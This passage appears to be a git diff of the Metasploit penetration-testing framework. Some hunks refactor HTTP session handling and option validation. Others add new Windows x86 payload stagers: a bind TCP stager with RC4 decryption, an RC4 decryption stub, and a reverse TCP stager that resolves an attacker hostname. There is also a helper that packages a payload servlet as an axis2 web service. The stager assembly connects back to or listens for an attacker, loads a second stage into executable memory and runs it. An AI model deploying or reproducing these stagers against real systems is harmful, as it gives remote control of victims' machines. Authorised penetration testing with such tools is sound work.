|
||||
|
||||
request_summary = "#{req.relative_resource} with UA '#{req.headers['User-Agent']}'"
|
||||
request_summary = "#{conn_id} with UA '#{req.headers['User-Agent']}'"
|
||||
|
||||
# Validate known UUIDs for all requests if IgnoreUnknownPayloads is set
|
||||
if datastore['IgnoreUnknownPayloads'] && ! framework.uuid_db[uuid.puid_hex]
|
||||
|
@ -281,11 +318,11 @@ protected
|
|||
resp.body = pkt.to_r
|
||||
|
||||
when :init_python
|
||||
print_status("Staging Python payload ...")
|
||||
print_status("Staging Python payload...")
|
||||
url = payload_uri(req) + conn_id + '/'
|
||||
|
||||
blob = ""
|
||||
blob << obj.generate_stage(
|
||||
blob << self.generate_stage(
|
||||
http_url: url,
|
||||
http_user_agent: datastore['MeterpreterUserAgent'],
|
||||
http_proxy_host: datastore['PayloadProxyHost'] || datastore['PROXYHOST'],
|
||||
|
@ -298,7 +335,7 @@ protected
|
|||
|
||||
# Short-circuit the payload's handle_connection processing for create_session
|
||||
create_session(cli, {
|
||||
:passive_dispatcher => obj.service,
|
||||
:passive_dispatcher => self.service,
|
||||
:conn_id => conn_id,
|
||||
:url => url,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
|
@ -310,10 +347,10 @@ protected
|
|||
})
|
||||
|
||||
when :init_java
|
||||
print_status("Staging Java payload ...")
|
||||
print_status("Staging Java payload...")
|
||||
url = payload_uri(req) + conn_id + "/\x00"
|
||||
|
||||
blob = obj.generate_stage(
|
||||
blob = self.generate_stage(
|
||||
uuid: uuid,
|
||||
uri: conn_id
|
||||
)
|
||||
|
@ -322,7 +359,7 @@ protected
|
|||
|
||||
# Short-circuit the payload's handle_connection processing for create_session
|
||||
create_session(cli, {
|
||||
:passive_dispatcher => obj.service,
|
||||
:passive_dispatcher => self.service,
|
||||
:conn_id => conn_id,
|
||||
:url => url,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
|
@ -334,7 +371,7 @@ protected
|
|||
})
|
||||
|
||||
when :init_native
|
||||
print_status("Staging Native payload ...")
|
||||
print_status("Staging Native payload...")
|
||||
url = payload_uri(req) + conn_id + "/\x00"
|
||||
uri = URI(payload_uri(req) + conn_id)
|
||||
|
||||
|
@ -343,7 +380,7 @@ protected
|
|||
begin
|
||||
# generate the stage, but pass in the existing UUID and connection id so that
|
||||
# we don't get new ones generated.
|
||||
blob = obj.stage_payload(
|
||||
blob = self.stage_payload(
|
||||
uuid: uuid,
|
||||
uri: conn_id,
|
||||
lhost: uri.host,
|
||||
|
@ -354,7 +391,7 @@ protected
|
|||
|
||||
# Short-circuit the payload's handle_connection processing for create_session
|
||||
create_session(cli, {
|
||||
:passive_dispatcher => obj.service,
|
||||
:passive_dispatcher => self.service,
|
||||
:conn_id => conn_id,
|
||||
:url => url,
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
|
@ -370,16 +407,20 @@ protected
|
|||
end
|
||||
|
||||
when :connect
|
||||
print_status("Attaching orphaned/stageless session ...")
|
||||
print_status("Attaching orphaned/stageless session...")
|
||||
|
||||
resp.body = ''
|
||||
conn_id = req.relative_resource
|
||||
|
||||
url = payload_uri(req) + conn_id
|
||||
url << '/' unless url[-1] == '/'
|
||||
|
||||
p url
|
||||
|
||||
# Short-circuit the payload's handle_connection processing for create_session
|
||||
create_session(cli, {
|
||||
:passive_dispatcher => obj.service,
|
||||
:passive_dispatcher => self.service,
|
||||
:conn_id => conn_id,
|
||||
:url => payload_uri(req) + conn_id + "/\x00",
|
||||
:url => url + "\x00",
|
||||
:expiration => datastore['SessionExpirationTimeout'].to_i,
|
||||
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
|
||||
:retry_total => datastore['SessionRetryTotal'].to_i,
|
||||
|
@ -392,16 +433,14 @@ protected
|
|||
unless [:unknown_uuid, :unknown_uuid_url].include?(info[:mode])
|
||||
print_status("Unknown request to #{request_summary}")
|
||||
end
|
||||
resp.code = 200
|
||||
resp.message = 'OK'
|
||||
resp.body = datastore['HttpUnknownRequestResponse'].to_s
|
||||
resp = nil
|
||||
self.pending_connections -= 1
|
||||
end
|
||||
|
||||
cli.send_response(resp) if (resp)
|
||||
|
||||
# Force this socket to be closed
|
||||
obj.service.close_client( cli )
|
||||
self.service.close_client(cli)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -77,6 +77,10 @@ module ReverseTcp
|
|||
"reverse TCP"
|
||||
end
|
||||
|
||||
def payload_uri
|
||||
"tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
|
||||
end
|
||||
|
||||
#
|
||||
# Starts monitoring for an inbound connection.
|
||||
#
|
||||
|
|
|
@ -183,8 +183,8 @@ class Msf::ModuleSet < Hash
|
|||
# @option info [Array<String>] 'files' List of paths to files that defined
|
||||
# +klass+.
|
||||
# @return [Class] The klass parameter modified to have
|
||||
# {Msf::Module#framework}, {Msf::Module#refname}, {Msf::Module#file_path},
|
||||
# and {Msf::Module#orig_cls} set.
|
||||
# Msf::Module.framework, Msf::Module#refname, Msf::Module#file_path,
|
||||
# and Msf::Module#orig_cls set.
|
||||
def add_module(klass, reference_name, info = {})
|
||||
# Set the module's reference_name so that it can be referenced when
|
||||
# instances are created.
|
||||
|
|
|
@ -12,8 +12,8 @@ class OptAddress < OptBase
|
|||
return 'address'
|
||||
end
|
||||
|
||||
def valid?(value)
|
||||
return false if empty_required_value?(value)
|
||||
def valid?(value, check_empty: true)
|
||||
return false if check_empty && empty_required_value?(value)
|
||||
return false unless value.kind_of?(String) or value.kind_of?(NilClass)
|
||||
|
||||
if (value != nil and value.empty? == false)
|
||||
|
|
|
@ -20,7 +20,7 @@ class OptAddressRange < OptBase
|
|||
return nil unless value.kind_of?(String)
|
||||
if (value =~ /^file:(.*)/)
|
||||
path = $1
|
||||
return false if not File.exists?(path) or File.directory?(path)
|
||||
return false if not File.exist?(path) or File.directory?(path)
|
||||
return File.readlines(path).map{ |s| s.strip}.join(" ")
|
||||
elsif (value =~ /^rand:(.*)/)
|
||||
count = $1.to_i
|
||||
|
@ -35,8 +35,8 @@ class OptAddressRange < OptBase
|
|||
return value
|
||||
end
|
||||
|
||||
def valid?(value)
|
||||
return false if empty_required_value?(value)
|
||||
def valid?(value, check_empty: true)
|
||||
return false if check_empty && empty_required_value?(value)
|
||||
return false unless value.kind_of?(String) or value.kind_of?(NilClass)
|
||||
|
||||
if (value != nil and value.empty? == false)
|
||||
|
|
|
@ -85,17 +85,13 @@ module Msf
|
|||
#
|
||||
# If it's required and the value is nil or empty, then it's not valid.
|
||||
#
|
||||
def valid?(value)
|
||||
if required?
|
||||
def valid?(value, check_empty: true)
|
||||
if check_empty && required?
|
||||
# required variable not set
|
||||
return false if (value == nil or value.to_s.empty?)
|
||||
return false if (value.nil? || value.to_s.empty?)
|
||||
end
|
||||
if regex
|
||||
if value.match(regex)
|
||||
return true
|
||||
else
|
||||
return false
|
||||
end
|
||||
return !!value.match(regex)
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
|
|
@ -15,7 +15,7 @@ class OptBool < OptBase
|
|||
return 'bool'
|
||||
end
|
||||
|
||||
def valid?(value)
|
||||
def valid?(value, check_empty: true)
|
||||
return false if empty_required_value?(value)
|
||||
|
||||
if ((value != nil and
|
||||
|
|
|
@ -13,8 +13,8 @@ class OptEnum < OptBase
|
|||
return 'enum'
|
||||
end
|
||||
|
||||
def valid?(value=self.value)
|
||||
return false if empty_required_value?(value)
|
||||
def valid?(value=self.value, check_empty: true)
|
||||
return false if check_empty && empty_required_value?(value)
|
||||
return true if value.nil? and !required?
|
||||
|
||||
(value and self.enums.include?(value.to_s))
|
||||
|
|
|
@ -13,18 +13,19 @@ class OptInt < OptBase
|
|||
end
|
||||
|
||||
def normalize(value)
|
||||
if (value.to_s.match(/^0x[a-fA-F\d]+$/))
|
||||
if value.to_s.match(/^0x[a-fA-F\d]+$/)
|
||||
value.to_i(16)
|
||||
else
|
||||
elsif value.present?
|
||||
value.to_i
|
||||
else
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
def valid?(value)
|
||||
return super if !required? and value.to_s.empty?
|
||||
return false if empty_required_value?(value)
|
||||
def valid?(value, check_empty: true)
|
||||
return false if check_empty && empty_required_value?(value)
|
||||
|
||||
if value and not value.to_s.match(/^0x[0-9a-fA-F]+$|^-?\d+$/)
|
||||
if value.present? and not value.to_s.match(/^0x[0-9a-fA-F]+$|^-?\d+$/)
|
||||
return false
|
||||
end
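Under the new normalize/valid? pair for OptInt, hex strings parse, blanks normalize to nil instead of 0, and non-numeric input is rejected (illustrative, assuming a loaded framework):

opt = Msf::OptInt.new('DEPTH', [false, 'Recursion depth'])
opt.normalize('0x1F')   # => 31
opt.normalize('42')     # => 42
opt.normalize('')       # => nil
opt.valid?('0x1F')      # => true
opt.valid?('foo')       # => false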
|
||||
|
||||
|
|
|
@ -12,18 +12,22 @@ class OptPath < OptBase
|
|||
return 'path'
|
||||
end
|
||||
|
||||
def normalize(value)
|
||||
value.nil? ? value : File.expand_path(value)
|
||||
end
|
||||
|
||||
def validate_on_assignment?
|
||||
false
|
||||
end
|
||||
|
||||
# Generally, 'value' should be a file that exists.
|
||||
def valid?(value)
|
||||
return false if empty_required_value?(value)
|
||||
def valid?(value, check_empty: true)
|
||||
return false if check_empty && empty_required_value?(value)
|
||||
if value and !value.empty?
|
||||
if value =~ /^memory:\s*([0-9]+)/i
|
||||
return false unless check_memory_location($1)
|
||||
else
|
||||
unless File.exists?(value)
|
||||
unless File.exist?(File.expand_path(value))
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
|
|
@ -12,12 +12,9 @@ class OptPort < OptInt
|
|||
return 'port'
|
||||
end
|
||||
|
||||
def valid?(value)
|
||||
if !required? and value.to_s.empty?
|
||||
super
|
||||
else
|
||||
super && normalize(value) <= 65535 && normalize(value) >= 0
|
||||
end
|
||||
def valid?(value, check_empty: true)
|
||||
port = normalize(value).to_i
|
||||
super && port <= 65535 && port >= 0
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -12,16 +12,16 @@ class OptRegexp < OptBase
|
|||
return 'regexp'
|
||||
end
|
||||
|
||||
def valid?(value)
|
||||
unless super
|
||||
def valid?(value, check_empty: true)
|
||||
if check_empty && empty_required_value?(value)
|
||||
return false
|
||||
elsif value.nil?
|
||||
return true
|
||||
end
|
||||
return true if (not required? and value.nil?)
|
||||
|
||||
begin
|
||||
Regexp.compile(value)
|
||||
|
||||
return true
|
||||
return super
|
||||
rescue RegexpError, TypeError
|
||||
return false
|
||||
end
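With the rewrite, OptRegexp validation reduces to: fail the empty check, accept nil for an optional value, otherwise the pattern must compile (illustrative):

opt = Msf::OptRegexp.new('PATTERN', [false, 'Match pattern'])
opt.valid?('^SSH-2\.0')   # => true  (compiles cleanly)
opt.valid?('([')          # => false (RegexpError is rescued)
opt.valid?(nil)           # => true  (optional and unset)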
|
||||
|
|
|
@ -28,9 +28,9 @@ class OptString < OptBase
|
|||
value
|
||||
end
|
||||
|
||||
def valid?(value=self.value)
|
||||
def valid?(value=self.value, check_empty: true)
|
||||
value = normalize(value)
|
||||
return false if empty_required_value?(value)
|
||||
return false if check_empty && empty_required_value?(value)
|
||||
return super
|
||||
end
|
||||
end
|
||||
|
|
|
@ -107,5 +107,41 @@ module Msf::Payload::Java
|
|||
zip
|
||||
end
|
||||
|
||||
end
|
||||
#
|
||||
# Used by stagers to create a axis2 webservice file as a {Rex::Zip::Jar}.
|
||||
# Stagers define a list of class files in @class_files which are pulled
|
||||
# from the MetasploitPayloads gem. The configuration file is created by
|
||||
# the payload's #config method.
|
||||
#
|
||||
# @option :app_name [String] Name of the Service in services.xml. Defaults to random.
|
||||
# @return [Rex::Zip::Jar]
|
||||
def generate_axis2(opts={})
|
||||
raise if not respond_to? :config
|
||||
|
||||
app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)
|
||||
|
||||
services_xml = %Q{<service name="#{app_name}" scope="application">
|
||||
<description>#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}</description>
|
||||
<parameter name="ServiceClass">metasploit.PayloadServlet</parameter>
|
||||
<operation name="run">
|
||||
<messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
|
||||
</operation>
|
||||
</service>
|
||||
}
|
||||
|
||||
paths = [
|
||||
[ 'metasploit', 'Payload.class' ],
|
||||
[ 'metasploit', 'PayloadServlet.class' ]
|
||||
] + @class_files
|
||||
|
||||
zip = Rex::Zip::Jar.new
|
||||
zip.add_file('META-INF/', '')
|
||||
zip.add_file('META-INF/services.xml', services_xml)
|
||||
zip.add_files(paths, MetasploitPayloads.path('java'))
|
||||
zip.add_file('metasploit.dat', config)
|
||||
zip.build_manifest(:app_name => app_name)
|
||||
|
||||
zip
|
||||
end
|
||||
|
||||
end
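The generate_axis2 helper returns a Rex::Zip::Jar, so a stager would typically just pack it to raw bytes and deploy the result as an .aar archive. Hedged sketch (the service name and deployment step are assumptions):

aar = generate_axis2(app_name: 'StatsService')   # :app_name is optional
raw = aar.pack                                   # serialize the archive to a String
# 'raw' is what gets uploaded, e.g. as StatsService.aar, to the axis2 services directory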
|
||||
|
|
|
@ -48,6 +48,7 @@ module Payload::Python::ReverseHttp
|
|||
|
||||
target_url << ':'
|
||||
target_url << opts[:port].to_s
|
||||
target_url << luri
|
||||
target_url << generate_callback_uri(opts)
|
||||
target_url
|
||||
end
|
||||
|
@ -56,7 +57,7 @@ module Payload::Python::ReverseHttp
|
|||
# Return the longest URI that fits into our available space
|
||||
#
|
||||
def generate_callback_uri(opts={})
|
||||
uri_req_len = 30 + rand(256-30)
|
||||
uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
|
||||
|
||||
# Generate the short default URL if we don't have enough space
|
||||
if self.available_space.nil? || required_space > self.available_space
|
||||
|
|
|
@ -50,7 +50,7 @@ module Msf::Payload::TransportConfig
|
|||
unless uri
|
||||
type = opts[:stageless] == true ? :init_connect : :connect
|
||||
sum = uri_checksum_lookup(type)
|
||||
uri = generate_uri_uuid(sum, opts[:uuid])
|
||||
uri = luri + generate_uri_uuid(sum, opts[:uuid])
|
||||
end
|
||||
|
||||
{
|
||||
|
|
|
@ -72,6 +72,7 @@ module Payload::Windows::BindTcp
|
|||
start:
|
||||
pop ebp
|
||||
#{asm_bind_tcp(opts)}
|
||||
#{asm_block_recv(opts)}
|
||||
^
|
||||
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
|
||||
end
|
||||
|
@ -192,7 +193,17 @@ module Payload::Windows::BindTcp
|
|||
|
||||
asm << asm_send_uuid if include_send_uuid
|
||||
|
||||
asm << %Q^
|
||||
asm
|
||||
end
|
||||
|
||||
#
|
||||
# Generate an assembly stub with the configured feature set and options.
|
||||
#
|
||||
# @option opts [Bool] :reliable Whether or not to enable error handling code
|
||||
#
|
||||
def asm_block_recv(opts={})
|
||||
reliable = opts[:reliable]
|
||||
asm = %Q^
|
||||
recv:
|
||||
; Receive the size of the incoming second stage...
|
||||
push 0 ; flags
|
||||
|
|
|
@ -0,0 +1,158 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/transport_config'
|
||||
require 'msf/core/payload/windows/bind_tcp'
|
||||
require 'msf/core/payload/windows/rc4'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# Complex bind_tcp_rc4 payload generation for Windows ARCH_X86
|
||||
#
|
||||
###
|
||||
|
||||
module Payload::Windows::BindTcpRc4
|
||||
|
||||
include Msf::Payload::TransportConfig
|
||||
include Msf::Payload::Windows::BindTcp
|
||||
include Msf::Payload::Windows::Rc4
|
||||
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
xorkey: xorkey,
|
||||
rc4key: rc4key,
|
||||
reliable: false
|
||||
}
|
||||
|
||||
# Generate the more advanced stager if we have the space
|
||||
unless self.available_space.nil? || required_space > self.available_space
|
||||
conf[:exitfunk] = datastore['EXITFUNC']
|
||||
conf[:reliable] = true
|
||||
end
|
||||
|
||||
generate_bind_tcp_rc4(conf)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate and compile the stager
|
||||
#
|
||||
def generate_bind_tcp_rc4(opts={})
|
||||
combined_asm = %Q^
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
#{asm_block_api}
|
||||
start:
|
||||
pop ebp
|
||||
#{asm_bind_tcp(opts)}
|
||||
#{asm_block_recv_rc4(opts)}
|
||||
^
|
||||
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
|
||||
end
|
||||
|
||||
def asm_block_recv_rc4(opts={})
|
||||
xorkey = Rex::Text.to_dword(opts[:xorkey]).chomp
|
||||
reliable = opts[:reliable]
|
||||
asm = %Q^
|
||||
recv:
|
||||
; Receive the size of the incoming second stage...
|
||||
push 0 ; flags
|
||||
push 4 ; length = sizeof( DWORD );
|
||||
push esi ; the 4 byte buffer on the stack to hold the second stage length
|
||||
push edi ; the saved socket
|
||||
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
|
||||
call ebp ; recv( s, &dwLength, 4, 0 );
|
||||
^
|
||||
|
||||
# Check for a failed recv() call
|
||||
if reliable
|
||||
asm << %Q^
|
||||
cmp eax, 0
|
||||
jle failure
|
||||
^
|
||||
end
|
||||
|
||||
asm << %Q^
|
||||
; Alloc a RWX buffer for the second stage
|
||||
mov esi, [esi] ; dereference the pointer to the second stage length
|
||||
xor esi, #{xorkey} ; XOR the stage length
|
||||
lea ecx, [esi+0x100] ; ECX = stage length + S-box length (alloc length)
|
||||
push 0x40 ; PAGE_EXECUTE_READWRITE
|
||||
push 0x1000 ; MEM_COMMIT
|
||||
; push esi ; push the newly received second stage length.
|
||||
push ecx ; push the alloc length
|
||||
push 0 ; NULL as we dont care where the allocation is.
|
||||
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
|
||||
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
||||
; Receive the second stage and execute it...
|
||||
; xchg ebx, eax ; ebx = our new memory address for the new stage + S-box
|
||||
lea ebx, [eax+0x100] ; EBX = new stage address
|
||||
push ebx ; push the address of the new stage so we can return into it
|
||||
push esi ; push stage length
|
||||
push eax ; push the address of the S-box
|
||||
read_more: ;
|
||||
push 0 ; flags
|
||||
push esi ; length
|
||||
push ebx ; the current address into our second stage's RWX buffer
|
||||
push edi ; the saved socket
|
||||
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
|
||||
call ebp ; recv( s, buffer, length, 0 );
|
||||
^
|
||||
|
||||
# Check for a failed recv() call
|
||||
if reliable
|
||||
asm << %Q^
|
||||
cmp eax, 0
|
||||
jle failure
|
||||
^
|
||||
end
|
||||
|
||||
asm << %Q^
|
||||
read_successful:
|
||||
add ebx, eax ; buffer += bytes_received
|
||||
sub esi, eax ; length -= bytes_received
|
||||
; test esi, esi ; test length
|
||||
jnz read_more ; continue if we have more to read
|
||||
pop ebx ; address of S-box
|
||||
pop ecx ; stage length
|
||||
pop ebp ; address of stage
|
||||
push ebp ; push back so we can return into it
|
||||
push edi ; save socket
|
||||
mov edi, ebx ; address of S-box
|
||||
call after_key ; Call after_key, this pushes the address of the key onto the stack.
|
||||
db #{raw_to_db(opts[:rc4key])}
|
||||
after_key:
|
||||
pop esi ; ESI = RC4 key
|
||||
#{asm_decrypt_rc4}
|
||||
pop edi ; restore socket
|
||||
ret ; return into the second stage
|
||||
^
|
||||
|
||||
if reliable
|
||||
if opts[:exitfunk]
|
||||
asm << %Q^
|
||||
failure:
|
||||
^
|
||||
asm << asm_exitfunk(opts)
|
||||
else
|
||||
asm << %Q^
|
||||
failure:
|
||||
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
|
||||
call ebp
|
||||
^
|
||||
end
|
||||
end
|
||||
|
||||
asm
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
@ -0,0 +1,98 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# RC4 decryption stub for Windows ARCH_X86 payloads
|
||||
#
|
||||
###
|
||||
module Payload::Windows::Rc4
|
||||
#
|
||||
# Register rc4 specific options
|
||||
#
|
||||
def initialize(*args)
|
||||
super
|
||||
register_options([ OptString.new('RC4PASSWORD', [true, 'Password to derive RC4 key from', 'msf']) ], self.class)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate assembly code that decrypts RC4 shellcode in-place
|
||||
#
|
||||
|
||||
def asm_decrypt_rc4
|
||||
%!
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Michael Schierl (schierlm[at]gmx[dot]de)
|
||||
; Version: 1.0 (29 December 2012)
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Input: EBP - Data to decode
|
||||
; ECX - Data length
|
||||
; ESI - Key (16 bytes for simplicity)
|
||||
; EDI - pointer to 0x100 bytes scratch space for S-box
|
||||
; Direction flag has to be cleared
|
||||
; Output: None. Data is decoded in place.
|
||||
; Clobbers: EAX, EBX, ECX, EDX, EBP (stack is not used)
|
||||
|
||||
; Initialize S-box
|
||||
xor eax, eax ; Start with 0
|
||||
init:
|
||||
stosb ; Store next S-Box byte S[i] = i
|
||||
inc al ; increase byte to write (EDI is increased automatically)
|
||||
jnz init ; loop until we wrap around
|
||||
sub edi, 0x100 ; restore EDI
|
||||
; permute S-box according to key
|
||||
xor ebx, ebx ; Clear EBX (EAX is already cleared)
|
||||
permute:
|
||||
add bl, [edi+eax] ; BL += S[AL] + KEY[AL % 16]
|
||||
mov edx, eax
|
||||
and dl, 0xF
|
||||
add bl, [esi+edx]
|
||||
mov dl, [edi+eax] ; swap S[AL] and S[BL]
|
||||
xchg dl, [edi+ebx]
|
||||
mov [edi+eax], dl
|
||||
inc al ; AL += 1 until we wrap around
|
||||
jnz permute
|
||||
; decryption loop
|
||||
xor ebx, ebx ; Clear EBX (EAX is already cleared)
|
||||
decrypt:
|
||||
inc al ; AL += 1
|
||||
add bl, [edi+eax] ; BL += S[AL]
|
||||
mov dl, [edi+eax] ; swap S[AL] and S[BL]
|
||||
xchg dl, [edi+ebx]
|
||||
mov [edi+eax], dl
|
||||
add dl, [edi+ebx] ; DL = S[AL]+S[BL]
|
||||
mov dl, [edi+edx] ; DL = S[DL]
|
||||
xor [ebp], dl ; [EBP] ^= DL
|
||||
inc ebp ; advance data pointer
|
||||
dec ecx ; reduce counter
|
||||
jnz decrypt ; until finished
|
||||
!
|
||||
end
|
||||
|
||||
def generate_stage(opts = {})
|
||||
p = super(opts)
|
||||
xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
|
||||
c1 = OpenSSL::Cipher::Cipher.new('RC4')
|
||||
c1.decrypt
|
||||
c1.key = rc4key
|
||||
p = c1.update(p)
|
||||
[ p.length ^ xorkey.unpack('V')[0] ].pack('V') + p
|
||||
end
|
||||
|
||||
def handle_intermediate_stage(_conn, _payload)
|
||||
false
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
def rc4_keys(rc4pass = '')
|
||||
m = OpenSSL::Digest.new('sha1')
|
||||
m.reset
|
||||
key = m.digest(rc4pass)
|
||||
[key[0, 4], key[4, 16]]
|
||||
end
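The key derivation above is just a SHA-1 split: the first four digest bytes become the XOR key for the length prefix and the next sixteen become the RC4 key. A quick standalone check:

require 'openssl'

digest = OpenSSL::Digest::SHA1.digest('msf')   # default RC4PASSWORD
xorkey = digest[0, 4]
rc4key = digest[4, 16]
xorkey.bytesize   # => 4
rc4key.bytesize   # => 16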
|
||||
end
|
||||
end
|
|
@ -51,7 +51,7 @@ module Payload::Windows::ReverseHttp
|
|||
|
||||
# Add extra options if we have enough space
|
||||
unless self.available_space.nil? || required_space > self.available_space
|
||||
conf[:url] = generate_uri
|
||||
conf[:url] = luri + generate_uri
|
||||
conf[:exitfunk] = datastore['EXITFUNC']
|
||||
conf[:ua] = datastore['MeterpreterUserAgent']
|
||||
conf[:proxy_host] = datastore['PayloadProxyHost']
|
||||
|
@ -61,7 +61,7 @@ module Payload::Windows::ReverseHttp
|
|||
conf[:proxy_type] = datastore['PayloadProxyType']
|
||||
else
|
||||
# Otherwise default to small URIs
|
||||
conf[:url] = generate_small_uri
|
||||
conf[:url] = luri + generate_small_uri
|
||||
end
|
||||
|
||||
generate_reverse_http(conf)
|
||||
|
@ -98,7 +98,7 @@ module Payload::Windows::ReverseHttp
|
|||
|
||||
# Choose a random URI length between 30 and 255 bytes
|
||||
if uri_req_len == 0
|
||||
uri_req_len = 30 + rand(256-30)
|
||||
uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
|
||||
end
|
||||
|
||||
if uri_req_len < 5
|
||||
|
|
|
@ -65,6 +65,7 @@ module Payload::Windows::ReverseTcp
|
|||
start:
|
||||
pop ebp
|
||||
#{asm_reverse_tcp(opts)}
|
||||
#{asm_block_recv(opts)}
|
||||
^
|
||||
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
|
||||
end
|
||||
|
@ -93,12 +94,11 @@ module Payload::Windows::ReverseTcp
|
|||
#
|
||||
# @option opts [Fixnum] :port The port to connect to
|
||||
# @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
|
||||
# @option opts [Bool] :reliable Whether or not to enable error handling code
|
||||
# @option opts [Fixnum] :retry_count Number of retry attempts
|
||||
#
|
||||
def asm_reverse_tcp(opts={})
|
||||
|
||||
retry_count = [opts[:retry_count].to_i, 1].max
|
||||
reliable = opts[:reliable]
|
||||
encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
|
||||
encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
|
||||
|
||||
|
@ -153,7 +153,7 @@ module Payload::Windows::ReverseTcp
|
|||
|
||||
handle_connect_failure:
|
||||
; decrement our attempt count and try again
|
||||
dec [esi+8]
|
||||
dec dword [esi+8]
|
||||
jnz try_connect
|
||||
^
|
||||
|
||||
|
@ -178,7 +178,17 @@ module Payload::Windows::ReverseTcp
|
|||
|
||||
asm << asm_send_uuid if include_send_uuid
|
||||
|
||||
asm << %Q^
|
||||
asm
|
||||
end
|
||||
|
||||
#
|
||||
# Generate an assembly stub with the configured feature set and options.
|
||||
#
|
||||
# @option opts [Bool] :reliable Whether or not to enable error handling code
|
||||
#
|
||||
def asm_block_recv(opts={})
|
||||
reliable = opts[:reliable]
|
||||
asm = %Q^
|
||||
recv:
|
||||
; Receive the size of the incoming second stage...
|
||||
push 0 ; flags
|
||||
|
|
|
@@ -0,0 +1,167 @@
# -*- coding: binary -*-

require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/reverse_tcp'

module Msf

###
#
# Complex reverse_tcp payload generation for Windows ARCH_X86
#
###

module Payload::Windows::ReverseTcpDns

  include Msf::Payload::TransportConfig
  include Msf::Payload::Windows::ReverseTcp

  #
  # Register dns specific options
  #
  def initialize(*args)
    super
    # Overload LHOST as a String value for the hostname
    register_options([ OptString.new("LHOST", [true, "The DNS hostname to connect back to"]) ], self.class)
  end

  #
  # Generate the first stage
  #
  def generate
    conf = {
      port: datastore['LPORT'],
      host: datastore['LHOST'],
      retry_count: datastore['ReverseConnectRetries'],
      reliable: false
    }

    # Generate the advanced stager if we have space
    unless self.available_space.nil? || required_space > self.available_space
      conf[:exitfunk] = datastore['EXITFUNC']
      conf[:reliable] = true
    end

    generate_reverse_tcp_dns(conf)
  end

  #
  # Generate and compile the stager
  #
  def generate_reverse_tcp_dns(opts={})
    combined_asm = %Q^
      cld                    ; Clear the direction flag.
      call start             ; Call start, this pushes the address of 'api_call' onto the stack.
      #{asm_block_api}
      start:
        pop ebp
      #{asm_reverse_tcp_dns(opts)}
      #{asm_block_recv(opts)}
    ^
    Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
  end

  #
  # Generate an assembly stub with the configured feature set and options.
  #
  # @option opts [Fixnum] :port The port to connect to
  # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
  # @option opts [Fixnum] :retry_count Number of retry attempts
  #
  def asm_reverse_tcp_dns(opts={})

    retry_count = [opts[:retry_count].to_i, 1].max
    encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first

    asm = %Q^
      ; Input: EBP must be the address of 'api_call'.
      ; Output: EDI will be the socket for the connection to the server
      ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)

      reverse_tcp:
        push '32'              ; Push the bytes 'ws2_32',0,0 onto the stack.
        push 'ws2_'            ; ...
        push esp               ; Push a pointer to the "ws2_32" string on the stack.
        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
        call ebp               ; LoadLibraryA( "ws2_32" )

        mov eax, 0x0190        ; EAX = sizeof( struct WSAData )
        sub esp, eax           ; alloc some space for the WSAData structure
        push esp               ; push a pointer to this struct
        push eax               ; push the wVersionRequested parameter
        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
        call ebp               ; WSAStartup( 0x0190, &WSAData );

        push eax               ; if we succeed, eax will be zero, push zero for the flags param.
        push eax               ; push null for reserved parameter
        push eax               ; we do not specify a WSAPROTOCOL_INFO structure
        push eax               ; we do not specify a protocol
        inc eax                ;
        push eax               ; push SOCK_STREAM
        inc eax                ;
